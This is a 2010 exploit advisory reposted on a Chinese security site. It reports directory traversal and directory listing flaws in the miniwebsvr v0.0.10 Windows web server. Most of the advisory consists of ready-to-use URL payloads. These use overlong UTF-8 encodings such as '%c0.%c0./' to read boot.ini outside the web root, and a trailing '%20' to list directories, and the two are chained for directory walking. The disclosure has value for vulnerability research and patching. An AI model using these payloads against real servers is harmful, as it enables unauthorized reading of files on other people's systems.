首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
miniwebsvr v0.0.10 Directory Traversal/Listing Exploits
来源:pocoftheday.blogspot.com 作者:Dr_IDE 发布时间:2010-05-13  

###################################################################
#
# miniwebsvr v0.0.10 Directory Traversal/Listing Exploits
# Found By: Dr_IDE
# Date:  May 12, 2010
# Download: http://sourceforge.net/projects/miniwebsvr/
# Tested on: Windows 7
#
###################################################################

- Description -

miniwebsvr v0.0.10 is a Windows based HTTP server. This is the latest
version of the application available.

miniwebsvr v0.0.10 is vulnerable to remote directory traversal attacks.

- Directory Traversal Technical Details -

http://[ webserver IP][:port]%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini
http://[ webserver IP][:port]%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/boot.ini

- Directory Listing Technical Details -

http://[ webserver IP][:port]%20 (This will list out the current directory)

- The two vulnerabilies could be used together for directory walking -

http://[ webserver IP][:port]%c0.%c0./%c0.%c0./%c0.%c0./%20
http://[ webserver IP][:port]%c0.%c0./%c0.%c0./%20
http://[ webserver IP][:port]%c0.%c0./%20

#[pocoftheday.blogspot.com]


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Adobe Shockwave Player 11.5.6.
·zervit Web Server v0.4 Source
·PolyPager 1.0rc10 (fckeditor)
·zervit Web Server v0.4 Directo
·Zervit version 0.4 suffers fro
·Apple Safari 4.0.5 parent.clos
·Microsoft Windows Outlook Expr
·WinXP SP2 Fr Download and Exec
·Hyplay 1.2.0326.1 (.asx) Local
·Invision Power Board Multiple
·Netvidade engine v1.0 Multiple
·WFTPD Server 3.30 Multiple rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved